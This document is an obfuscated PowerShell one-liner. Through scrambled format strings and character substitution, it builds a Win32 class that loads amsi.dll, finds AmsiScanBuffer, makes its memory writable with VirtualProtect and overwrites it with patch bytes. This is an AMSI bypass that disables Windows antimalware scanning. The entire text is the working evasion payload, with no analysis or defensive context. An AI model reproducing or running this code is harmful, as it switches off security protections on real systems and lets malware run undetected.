.((Get-VArIABLe '*mdR*').NamE[3,11,2]-jOiN'') ( ((("{26}{20}{7}{8}{15}{10}{19}{25}{18}{21}{13}{17}{5}{6}{23}{24}{3}{4}{1}{27}{9}{22}{0}{2}{14}{16}{11}{12}" -f 'xC3  ))
[Runti','2]::V4RVibY','me.Inte','et-Variable -Name P -Value (0)
','[Win3','WbYnIbYnN32}
 
Set-Variable -Name lOAdliBRarY -Value ([Win32]::(V4R{0}{1}{3}{2}V4R -fIa4Loa','dLibIa4,Ia4rIa4,Ia4yIa4,Ia4arIa4  ).Invoke(  V4RamV4R + (V4R{0}{1}V4R -f Ia4si.Ia4,Ia4dllIa4  )))
Set-Variable -Name adDRess -Value ([Win32]::(V4R{2}{0}{4}{1}{3}V4R -f Ia4etPIa4,Ia4ocAddIa4,Ia4GIa4,Ia4ressIa4,Ia4rIa4 ).Invoke(XpN{loadLbYnibYnBrAbYnRy}, (V4R{0}{1','sing System;
using S','ystem.Runtime.InteropServices;
 
public class Win32 {
 
    [Dll','V4R( XpN{AbYnddrbYnESS}, [uint32]5, 0x40, [Ref]XpN{P}  )
Set-Variable -Name PATCH -Value ([Byte[]','hModule, strin','a4yIa4,Ia4CopIa4).Invoke(  XpN{pbYnATbYn','ch}, 0, XpN{AdbYnDress}, 6  )','flOldProt','ropServices.Marshal]::(  V','Import(V4Rkernel32V4R)]
    public static extern IntPtr GetProcAddress(IntPtr ','4R{1}{0}V4R -fI','ect);
 
}
V4R@)
 
 & ( V4R{1}{2}{0}V4R -fIa4peIa4,Ia4AIa4,Ia4dd-TyIa4) XpN{','DllImport(V4Rkernel32V4R)]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect','g procName);
 
    [DllImport(V4Rkernel32V4R)]
    public static extern IntP','Value (@V4R
 
u',', out uint lp','] ( 0xB8, 0x57, 0x00, 0x07, 0x80, 0','}V4R-fIa4AIa4,Ia4msiIa4  ) +','   ( V4R{0}{1}V4R-fIa4SIa4,Ia4canIa4  )   +   (V4R{1}{0}V4R-fIa4fferIa4,Ia4BuIa4 ) ))
S','tr LoadLibrary(string name);
 
    [','Set-Variable -Name wIN32 -','nRTUbYnAlPrOtbYnEcT')) -REpLacE ([CHAr]73+[CHAr]97+[CHAr]52),[CHAr]39-CRePLAce([CHAr]88+[CHAr]112+[CHAr]78),[CHAr]36 -CRePLAce'bYn',[CHAr]96  -REpLacE'V4R',[CHAr]34))
